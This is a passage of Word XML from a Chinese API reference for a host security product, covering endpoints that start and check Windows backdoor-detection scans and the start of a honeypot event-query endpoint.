          <w:p w14:paraId="7241316A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A119ABB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2069CF14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>详情，见</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>《附录2》</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="458C5F05" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="479C8B45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B97BD2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6740F20F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="419328AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35262B6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="321" w:name="_Toc115166233"/>
      <w:bookmarkStart w:id="322" w:name="windows后门检测-开始扫描"/>
      <w:bookmarkEnd w:id="320"/>
      <w:r>
        <w:t>Windows后门检测-开始扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="321"/>
    </w:p>
    <w:p w14:paraId="145C713B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Windows后门检测执行扫描任务的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3970913E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E80C2D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/backdoor/win/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1CBF078C"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225"/>
        <w:gridCol w:w="1213"/>
        <w:gridCol w:w="1034"/>
        <w:gridCol w:w="6610"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7C1A6C5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791591A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E143314" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77F87109" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11156042" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="01ED6D78" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CBC01F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73A3C348" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C879298" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="280FD1B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>范围，0:当前账号管理下的全部主机； 1:自定义主机； 2:自定义业务组；</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32040A89" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C8D3E1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21945D6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53D0808B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00E0254F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 则</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3A18FFAA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60150482" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="215AD34C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3468C129" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31C6FE5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=2, 则groups不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C14FA57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD4D6C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>// 当选全部主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>// 当选自定义主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["979f3c4d44b2e765", "979f3c4d44b2e766"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>// 当选自定义业务组</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groups": [1, 2, 3]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F40CE8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64403ECD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB620EF"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BC669E" w14:paraId="7F1B454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91A17DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5912451D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CF23C7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64071771" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="62F82F5B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="543EB9D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="056B8A21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="099EC97E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BA48E69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="663D8E66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628CBED0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>1、如果功能开关未打开，则会抛出异常及相关提示</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2、如果上次扫描任务未执行完毕，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8110A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="323" w:name="_Toc115166234"/>
      <w:bookmarkStart w:id="324" w:name="windows后门检测-查询扫描"/>
      <w:bookmarkEnd w:id="322"/>
      <w:r>
        <w:t>Windows后门检测-查询扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="323"/>
    </w:p>
    <w:p w14:paraId="0E68770A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Windows后门检测当前正在执行的扫描任务的状态查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AB8017" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465DDACE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/backdoor/win/check/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="199FF29F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282B72D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E0601E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD42E79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/backdoor/win/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0607AE0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FACF73F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>retcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": "success",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59961383"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941"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3347"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="048D9C2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D776A85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="193E59AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0802B796" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B49AD63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C8F28F2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47ABB737" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21A0A448" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ACB15D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C113E48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2:正在执行 3:执行成功 4:执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="357D3122" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B22AF1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CA4FE9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10C8E2BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05AF69DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>2:running</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 3:success 4: failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1ED2A3C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="325" w:name="_Toc115166235"/>
      <w:bookmarkStart w:id="326" w:name="网络蜜罐"/>
      <w:bookmarkEnd w:id="318"/>
      <w:bookmarkEnd w:id="324"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>网络蜜罐</w:t>
      </w:r>
      <w:bookmarkEnd w:id="325"/>
    </w:p>
    <w:p w14:paraId="11E17BCF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="327" w:name="_Toc115166236"/>
      <w:bookmarkStart w:id="328" w:name="查询结果-7"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="327"/>
    </w:p>
    <w:p w14:paraId="1257735E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐上报事件的数据查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF19558" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FB33A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
